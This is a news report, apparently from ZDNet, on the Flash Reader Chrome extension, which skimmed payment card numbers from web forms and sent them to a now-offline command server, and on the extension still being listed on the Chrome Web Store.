A malicious Google Chrome extension that can recognize and steal payment card details entered in web forms is still available on the Chrome Web Store.
The extension is the work of a cyber-criminal group and has been at the heart of a malware distribution effort in the past.
The website through which the extension was initially distributed is now down, but the extension is still available on the Play Store, meaning it could be used for future campaigns to infect new users.
Until now, the extension has been installed by roughly 400 users, according to stats available on its official Chrome Web Store listing.
The extension’s name is Flash Reader. According to a report from ElevenPaths, Telefonica’s cyber-security division, the extension was distributed via http://fbsgang[.]info/flashplayer/, a page to which crooks redirected web traffic, possibly from malvertising campaigns or exploit kits.
The page used the classic lure of “you don’t have Flash installed, use this Chrome extension instead,” and redirected users to Flash Reader’s official Chrome Web Store page to install it.
According to a review of the extension’s code performed by this reporter and a third-party –to confirm ElevenPath’s findings— the extension contained code that intercepted any form submission made on any web page.
Regex rules would analyze the form’s content for card number patterns specific to Visa, Mastercard, American Express, and Discovery card formats.
Once the extension would find the data it wanted, it would send the harvested data to its command and control (C&C) server, located at http://fbsgang[.]info/cc/gate.php.
This command and control server is now down, but C&C servers are often taken down between campaigns. This doesn’t mean that users who have currently installed this extension are safe. Their card data was most likely already collected months before.
There is also the danger that the group could return with a new campaign, or push an extension update with a new C&C server address.
One thing missing from the extension’s source code was data collection functions for card issuer names, card expiration dates, or CVV codes. The lack of these details would make the collected card numbers less valuable on the dark market.
ElevenPaths researchers said they notified Google of the extension, which was uploaded on the Chrome Web Store in February last year. ZDNet has also sent an email to the Web Store team earlier today about the extension still being active.
One of the security researchers to whom ZDNet reached out suggested that the extension might have also been a test run for an upcoming campaign, although a test run that managed to infect 400 Chrome users, which, if anything, proves how easy is to get people to install crappy extensions without sparing a thought to security considerations.